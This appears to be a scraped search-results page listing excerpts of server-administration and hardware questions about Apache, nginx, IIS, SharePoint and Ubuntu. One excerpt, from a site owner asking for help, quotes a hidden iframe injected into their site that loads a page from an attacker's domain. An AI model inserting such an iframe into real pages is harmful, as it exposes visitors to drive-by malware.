Search Results

Search found 17781 results on 712 pages for 'css height'.

Page 496/712 | < Previous Page | 492 493 494 495 496 497 498 499 500 501 502 503  | Next Page >

  • Which CPU for SQL Server machine (Xeon, i5, i7, AMD Phenom)?

    - by Tony_Henrich
    I am going to build a full height server machine to be used for SQL Server 2008 64bit. I have $400 to spend for a CPU. Which CPU should I get among i5, i7, Xeon and Phenom in terms of performance. There are so many options and I am out of touch with the latest stuff. All I know I want something fast and works with DDR3 fast memory and works with some kind of fast system bus. I don't care about overclocking, 3D & gfx benchmarks. The machine is not used for games and gfx apps. Any recommendations?

    Read the article

  • Mechanical mouse using USB-to-PS/2 Adapter freezes occasionally

    - by izn
    I am using an AOpen PS/2 mechanical mouse in Ubuntu 11.10 with a Staples USB-to-PS/2 Adapter with my Intel DP67DE motherboard. The mouse is more comfortable for my hand as it has a lower height than optical mouses. Occasionally the mouse cursor freezes and often I have to unplug it from the USB port and plug it back in to unfreeze it. This happens with all the USB ports. I've been using the adapter for a few weeks now and this seems to be happening more often recently. What might be happening and is there anything that can be done to fix this?

    Read the article

  • Apache hanging with MaxClients is reached

    - by Ash White
    My Apache 2.2 (preform MPM) is hanging when MaxClients is reached, rather than queueing up requests and serving them when child processes become free. When this happens, the web server is totally unresponsive until it is manually restarted. The server stack is Ubuntu 8, MySQL 5, PHP 5. Hardware is Dual Xeons (2.8) with 2GB of RAM. It serves 30,000 - 50,000 pageviews per day. Static images, CSS, and JS are offloaded to a separate server and PHP is cached using eAccelerator. The HTML output of many pages is cached to the filesystem. Relevant Apache directives: KeepAlive On MaxKeepAliveRequests 50 KeepAliveTimeout 2 StartServers 2 MaxClients 150 MinSpareThreads 25 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 2000

    Read the article

  • Apache gives empty reply

    - by Jorge Bernal
    It happens randomly, and only on moodle installations. Apache don't add a line in the logs when this happens, and I don't know where to look. koke@escher:~/Code/eboxhq/moodle[master]$ curl -I http://training.ebox-technologies.com/login/signup.php?course=WNA001 curl: (52) Empty reply from server koke@escher:~/Code/eboxhq/moodle[master]$ curl -I http://training.ebox-technologies.com/login/signup.php?course=WNA001 HTTP/1.1 200 OK The apache conf is quite straightforward and works perfectly in the other vhosts <VirtualHost *:80> ServerAdmin [email protected] DocumentRoot /srv/apache/training.ebox-technologies.com/htdocs ServerName training.eboxhq.com ErrorLog /var/log/apache2/training.ebox-technologies.com-error.log CustomLog /var/log/apache2/training.ebox-technologies.com-access.log combined <FilesMatch "\.(ico|gif|jpe?g|png|js|css)$"> ExpiresActive On ExpiresDefault "access plus 1 week" Header add Cache-Control public </FilesMatch> </VirtualHost> Using apache 2.2.9 php 5.2.6 and moodle 1.9.5+ (Build: 20090722) Any ideas welcome :)

    Read the article

  • Nginx location issue

    - by dave
    I'm trying to set a longer (30 day) 'expires' header for my (images only) in the /misc-stuff/ directory. This is what I'm using for my site : # Serve static files directly from nginx location ~* \.(jpg|jpeg|gif|png|bmp|ico|pdf|flv|swf|exe|html|htm|txt|css|js) { add_header Cache-Control public; add_header Cache-Control must-revalidate; expires 7d; } I want to be able to keep that code in to handle regular site images, but create a new block to handle the /misc-stuff/ directory. I have tried : location ^~ /misc-stuff/ { ... } The problem I'm having now is that my backup .php files in that directory show up as plain text if someone tries to access it. How do I set it up so ONLY .gif images in the /misc-stuff/ directory are effected?

    Read the article

  • htaccess rewrite and auth conflict

    - by Michael
    I have 2 directories each with a .htaccess file: html/.htaccess - There is a rewrite in this file to send almost everything to url.php RewriteCond %{REQUEST_URI} !(exported/?|\.(php|gif|jpe?g|png|css|js|pdf|doc|xml|ico))$ RewriteRule (.*)$ /url.php [L] and html/exported/.htaccess AuthType Basic AuthName "exported" AuthUserFile "/home/siteuser/.htpasswd" require valid-user If I remove html/exported/.htaccess the rewriting works fine and the exported directory can be access. If I remove html/.htaccess the authentication works fine. However when I have both .htaccess files exported/ is being rewritten to /url.php. Any ideas how I can prevent it?

    Read the article

  • Why does using nginx as a reverse proxy break local links?

    - by tsvallender
    I've just set up nginx as a reverse proxy, so some sites served from the box are served directly by it and others are forwarded to a Node.js server. The site being served by Node.js, however, is displayed with no CSS or images, so I assume the links are somehow being broken, but don't know why. The following is the only file in /etc/nginx/sites-enabled: server { listen 80; ## listen for ipv4 listen [::]:80 default ipv6only=on; ## listen for ipv6 server_name dev.my.site; access_log /var/log/nginx/localhost.access.log; location / { root /var/www; index index.html index.htm; } location /myNodeSite { proxy_pass http://127.0.0.1:8080/; proxy_redirect off; proxy_set_header Host $host; } } I had thought perhaps it was trying to find them in /var/www due to the first entry, but removing that doesn't seem to help.

    Read the article

  • nginx static files caching doesn't work

    - by user74344
    here is my conf file: usr/local/nginx/sites-available/default server { listen 80; server_name localhost; location / { root html; index index.php index.html index.htm; } # redirect server error pages to the static page /50x.html error_page 500 502 503 504 /50x.html; location = /50x.html { root html; } # serve static files directly location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico|swf)$ { expires 30d; } but it doesn't cache static files, how should I fix it? thanks a lot

    Read the article

  • Programmer Desk

    - by Jim
    I'm building a home office and looking for the ultimate desk. Lot's of resources about the great desk chairs, but very little on great modern desks. Requirements: $1000-$2000. Straight. No side cabinets. Attractive. Electric adjustable would be nice, but I haven't found very attractive looking one. The one recommended in this thread is pretty ugly http://www.beyondtheofficedoor.com/adjustable-height-table.php The Herman Miller Sense desk looks nice: http://www.csnofficefurniture.com/asp/superbrowse.asp?clid=32&caid=&sku=HML1212&refid=PG7-HML1212 . Big fan of Herman Miller after my Aeron and Mirra. Does anyone have any experience with their desks? EDIT: Thanks all for the advice. I ended up just going with the Galant after seeing it and the Herman Miller's in person. What a great desk!

    Read the article

  • IIS 7.5 401.3 Access Denied

    - by Jeffrey
    I am having this weird issue with IIS 7.5 on Windows 2008 R2 x64. I created a site in IIS and manually created a test file index.html and everything worked. When I try to do a deployment, I copy all the files from my local PC to the IIS server, try to access index.html (this is the proper deployed file) and getting 401.3 access denied error. I then try to manually recreate index.html and copy content into this newly created file and the page is accessible again... I just can't figure this out. So the issue is that IIS 7.5 can't server files that have been copied from other PCs. I tried to reset/apply permission settings to the copied folders/files but nothing has worked. Please help. Thanks! By the way, the files that I copied are just some html cutups i.e. generic html, css and image files, nothing special.

    Read the article

  • Nginx .zip files return 404

    - by Kenley Tomlin
    I have set up Nginx as a reverse proxy for Node and to serve my static files and user uploaded images. Everything is working beautifully except that I can't understand why Nginx can't find my .zip files. Here is my nginx.conf. user nginx; worker_processes 1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { include mime.types; proxy_cache_path /var/www/web_cache levels=1:2 keys_zone=ooparoopaweb_cache:8m max_size=1000m inactive=600m; sendfile on; upstream *******_node { server 172.27.198.66:8888 max_fails=3 fail_timeout=20s; #fair weight_mode=idle no_rr } upstream ******_json_node { server 172.27.176.57:3300 max_fails=3 fail_timeout=20s; } server { #REDIRECT ALL HTTP REQUESTS FOR FRONT-END SITE TO HTTPS listen 80; server_name *******.com www.******.com; return 301 https://$host$request_uri; } server { #MOBILE APPLICATION PROXY TO NODE JSON listen 3300 ssl; ssl_certificate /*****/*******/json_ssl/server.crt; ssl_certificate_key /*****/******/json_ssl/server.key; server_name json.*******.com; location / { proxy_pass http://******_json_node; proxy_redirect off; proxy_set_header Host $host ; proxy_set_header X-Real-IP $remote_addr ; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for ; proxy_set_header X-Forwarded-Proto https; client_max_body_size 20m; client_body_buffer_size 128k; proxy_connect_timeout 90s; proxy_send_timeout 90s; proxy_read_timeout 90s; proxy_buffers 32 4k; } } server { #******.COM FRONT-END SITE PROXY TO NODE WEB SERVER listen 443 ssl; ssl_certificate /***/***/web_ssl/********.crt; ssl_certificate_key /****/*****/web_ssl/myserver.key; server_name mydomain.com www.mydomain.com; add_header Strict-Transport-Security max-age=500; location / { gzip on; gzip_types text/html text/css application/json application/x-javascript; proxy_pass http://mydomain_node; proxy_redirect off; proxy_set_header Host $host ; proxy_set_header X-Real-IP $remote_addr ; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for ; proxy_set_header X-Forwarded-Proto https; client_max_body_size 20m; client_body_buffer_size 128k; proxy_connect_timeout 90s; proxy_send_timeout 90s; proxy_read_timeout 90s; proxy_buffers 32 4k; } } server { #ADMIN SITE PROXY TO NODE BACK-END listen 80; server_name admin.mydomain.com; location / { proxy_pass http://mydomain_node; proxy_redirect off; proxy_set_header Host $host ; proxy_set_header X-Real-IP $remote_addr ; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for ; client_max_body_size 20m; client_body_buffer_size 128k; proxy_connect_timeout 90s; proxy_send_timeout 90s; proxy_read_timeout 90s; proxy_buffers 32 4k; } } server { # SERVES STATIC FILES listen 80; listen 443 ssl; ssl_certificate /**/*****/server.crt; ssl_certificate_key /****/******/server.key; server_name static.domain.com; access_log static.domain.access.log; root /var/www/mystatic/; location ~*\.(jpeg|jpg|png|ico)$ { gzip on; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/rss+xml text/javascript image/svg+xml application/vnd.ms-fontobject application/x-font-ttf font/opentype image/png image/jpeg application/zip; expires 10d; add_header Cache-Control public; } location ~*\.zip { #internal; add_header Content-Type "application/zip"; add_header Content-Disposition "attachment; filename=gamezip.zip"; } } } include tcp.conf; Tcp.conf contains settings that allow Nginx to proxy websockets. I don't believe anything contained within it is relevant to this question. I also want to add that I want the zip files to be a forced download.

    Read the article

  • Website attacked with a hidden iframe (q5x.ru)

    - by Dreas Grech
    A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link). A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem? The iframe code was something of the sort: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

    Read the article

  • How to Enable Multirow Bookmarks Toolbar?

    - by IneedHelp
    I have tried using Multirow Bookmarks Toolbar Plus and Roomy Bookmarks Toolbar Firefox add-ons, but the problem is that they are constantly stressing my CPU (even when idling). It probably has something to do with version 11 of the browser. Anyway, is there some clean way to increase the height of the bookmarks toolbar and allow it to display bookmarks on multiple rows? I've read a lot of articles that refer to userChrome.css and I have tried a dozen solutions, but none worked because they were outdated. Please help me with this.

    Read the article

  • droid cam makefile understanding and error

    - by nerorevenge
    I tried installing the droid cam on my fedora 19 (64 bit) . Link to the droid cam application is here and whenever I try to install it , the Makefile which is as follows is invoked obj-m := v4l2loopback-dc.o all: make -C /lib/modules/`uname -r`/build M=`pwd` test: gcc test.c -o test clean: make -C /lib/modules/`uname -r`/build M=`pwd` clean insmod: sudo insmod v4l2loopback-dc.ko width=320 height=240 rmmod: sudo rmmod v4l2loopback-dc.ko and here is the error -- INSTALL: Webcam parameters: '320' and '240' -- INSTALL: Building v4l2loopback-dc.ko make -C /lib/modules/`uname -r`/build M=`pwd` make: *** /lib/modules/3.9.5-301.fc19.x86_64/build: No such file or directory. Stop. make: *** [all] Error 2 -- INSTALL: v4l2loopback-dc.ko not built.. Failure build happens to be a symbolic link.I was wondering what exactly is the makefile trying to and why is it failing?

    Read the article

  • Creating cookieless application on development machine with asp.net

    - by zaladane
    I am thinking about setting up a new domain to host static content on my website and have it cookieless just like Stackoverflow with their static domain. So before going ahead and buying the domain and setting it up I wanted to test it on my developement machine first under localhost (I have to mention that i am planning on having IIS running on my new domain for the static files). I therefore created a new application under IIS and disabled session state and forms authentication. When my main application needs resources like css, images and js , I use the path to the "static" application where they are hosted. The problem is that when I look at the request and the response for the requested files, they still have the session_id cookie defined as well as the asp.net authentication cookie. Is it at all possible to accomplish what i am trying to do on a development machine or do i have to just go ahead and purchase the new domain which hopefully with make things right? I tried to read about cookieless domain but can't figure out what i might be missing.

    Read the article

  • How can you add two lines of text on a single line in Word 2010?

    - by deodorant
    Odd title, wasn't sure how to word it. Basically, I have two separate fonts I want to be on the same line, for resume purposes. My name is in a large font at the top, and I want my email and website address right-aligned directly beside it, one on top of the other. However, I want the email and website to combine to the same height as my name. Is this even possible with Word? Surely it is. Here is an awesome graphic of what I'm hoping for. Thanks! edit Seems new users can't post images. Link is here: http://i.stack.imgur.com/0gc3s.png

    Read the article

  • IIS 7.5 doesn't load static html pages

    - by Kizz
    There is an IIS 7.5 freshly installed on a dedicated server. ASP.NET 4.0 Web app copied to its folder, new website is created on its own IP on post 80, IIS_IUSR and IUSR accounts have read/execute rights on site's folder, the site is assigned to its own Integrated app pool with 4.0 .NET (I tried Classic pool with the same results). The problem: when I try to access this web site, browser only loads content generated by .NET resources such as aspx pages, .axd files, etc. Static images, static js, css and html files are in the page source but IIS doesn't serve them. Dev tools in all browsers complain that all those static resources have been sent by the server with wrong content type (plain text instead of image, styles, etc). What do I do wrong?

    Read the article

  • Screenshot shows black area with dual monitors on Ubuntu

    - by Hollister
    When using the built-in window screenshot function on Ubuntu (alt-printscreen) with dual monitors, a black rectangle covers about the top third of the captured window (or that area is not captured). When capturing the entire screen (printscreen), the left monitor shows the same size rectangle, but it doesn't cover the window, but pushes it down. It's as if the capture is using the smaller monitor's dimensions, and is not aware of the larger monitor. Here are the images: Window capture: http://moby.to/8d69hp Screen capture: http://moby.to/v99gqs When using the command line, I get this error: $ gnome-screenshot --window (gnome-screenshot:8522): GdkPixbuf-CRITICAL **: gdk_pixbuf_composite: assertion `dest_y >= 0 && dest_y + dest_height <= dest->height' failed System info: Ubuntu 10.04.2 LTS (Lucid) Linux 2.6.32-32-generic Left monitor (laptop) 1280x800 Right monitor (external) 1920x1080 Is there a way to get this to work? Edit: this does not happen with one monitor or when the monitors are mirrored.

    Read the article

  • Are animated GIFs supported in Google Chrome?

    - by James Goodwin
    I have recently been testing a website and found animated gif images that seem to show fine in IE and Firefox but in Google Chrome they only show briefly and then dissapear! This happens if I view the image on the page or view the file directly. Are there any reported problems in displaying GIFs in Chrome, or is it just being fussy? There seemed to have been some problems in older versions of Chrome, but it's hard to believe something as simple as this wouldn't have been fixed by now. The version of Google Chrome I am using is: 4.1.249.1021 Not sure if this is relevant, but some info about the image: Width: 216 pixels Height: 36 pixels Horizontal resolution: 96dpi Vertical resolution: 96dpi Bit Depth: 32 Frame Count: 3 EDIT: Seems to be a problem relating to the latest beta version of Chrome, as it works fine in 4.0.249

    Read the article

  • Is it me or is developing web based data entry GUIs a big pain?

    - by GregH
    Maybe it's me or maybe it isn't. I don't have a huge amount of experience of developing web based data entry software but do have some. I used to do it quite a bit years ago. Used to use Oracle Forms, Visual Studio, various 4th generation languages, and performing the user interface layout used to be a snap. Now doing the user interface for developing web applications seems to be a huge pain in the rear. Just trying to get text entry fields and widgets to go where they are supposed to go on the screen is a total pain. You have to know Javascript, CSS, JQuery, HTML, etc. There must be an easier way to develop data entry forms that produce the needed underlying code for a web page. Maybe I'm just not looking in the right place. There must be some WYSIWYG GUI development tools for the web for developing data entry forms out there. Anybody know of any?

    Read the article

  • Linux Programs for pulling measurements from graphics

    - by Zack
    As a front-end developer, I'm often given graphics of web sites and told pretty much, "Make it work." I've recently started working on Linux 100% of the time and was wondering if there's any programs out there that're good for "digesting" graphics. All I do, pretty much, is draw little selection boxes and takes notes on their dimensions; I also slice out a piece of the graphic (i.e. copy out just the part of the graphic I need for to make the same effect in CSS). Before now I've been very happy with Fireworks, but I need something for Linux, any suggestions? As a note, I mainly deal with pixel based graphics, so the program being vector based isn't a necessity.

    Read the article

  • How many users are "many users"?

    - by kemp
    I need to find a solution for a website which is struggling under load. The site gets ~500 simultaneous connections during peak time, and counts around 42k hits per day. It's a wordpress based site bridged with a vbulletin forum with a lot of contents and a fairly complex structure which makes intensive use of the database. I already implemented code level full page caching (without this the server just crashes), and configured all other caching directives as well as combining css files and the like to limit http requests as much as possible. I need to understand if there is more that can be done via software or if the load is just too much for the server to handle and it needs to be upgraded, because the server goes down occasionally during peak times. Can't access the server now, but it's a dedicated CentOS machine (I think 4GB ram, can't say what CPU) running apache/mysql. So back to the main question: how can I know when the users are just too many?

    Read the article

  • Sharepoint Services 3.0: 403 Forbidden fun

    - by gravyface
    Can't get to the Administration or the "companyweb" site itself; was working up to a week ago. Old threads, blog posts, etc. indicate that there was an issue with a KB update but was resolved when .NET Framework 2.0 SP1 was deployed/installed. Running Process Monitor, I can see a lot of PATH NOT FOUND','NAME NOT FOUND for c:\inetpub\companyweb\Default.aspx, \_themes\ice\...\foo.css, etc. for the w3wp.exe process on CreateFileorQueryOpenoperations. These files do not exist in the location specified. I don't recall these files actually existing in that folder, but I believe they're "created" when requested, pulled in from Common Files/Shared or whatever, in typically-awesome Microsoft Web architecture land (</rant>). Besides reinstalling (which I'm sure will be as much fun as migrating from one server to another was), anyone know what's going on? Google-fu has alluded me.

    Read the article

  • 5v PCI to PCI-X or PCIe adapter?

    - by SiegeX
    We unfortunately have a very expensive ($10K) full-length 5 volt PCI card that we would like to use in the same system as another expensive PCI-X card. As luck would have it, it seems that PCI-X is not backwards compatible with 5v PCI cards. It would be a real shame to have to order a whole new server just to accommodate these two cards together. Does there exist any internal converter/adapter that will allow one to place a full-length 5v PCI card into either a PCI-X or PCIe slot? I've found an external expansion box that suits our needs but it's 1) External and 2) $1100. The only internal adapters I've been able to find go from Low-profile PCI - PCIe; nothing that seems to support full-height, full-length PCI cards.

    Read the article

  • New LAMP server, all links redirecting to localhost

    - by serilain
    I've got a very frustrating issue with what should be a bespoke install of Ubuntu 12.04, the LAMP config provided in apt-get install lamp-server^, and a web application called The Fascinator. After installing those three things and making no changes to any of them, I can access the application through a public IP (http://lib-hf1.lib.sfu.ca:9997 for the curious), but the domain of every link within that page is changed to localhost, including links to images and CSS, so nothing loads correctly and all of the links are broken. I've Googled around and found some people who appear to be having this issue with WP and Drupal, but nothing makes reference to a system-wide setting, and no one using the Fascinator seems to be having this issue. I have a faint memory that this might have something to do with mod_rewrite, but I'm pretty well stumped.

    Read the article

< Previous Page | 492 493 494 495 496 497 498 499 500 501 502 503  | Next Page >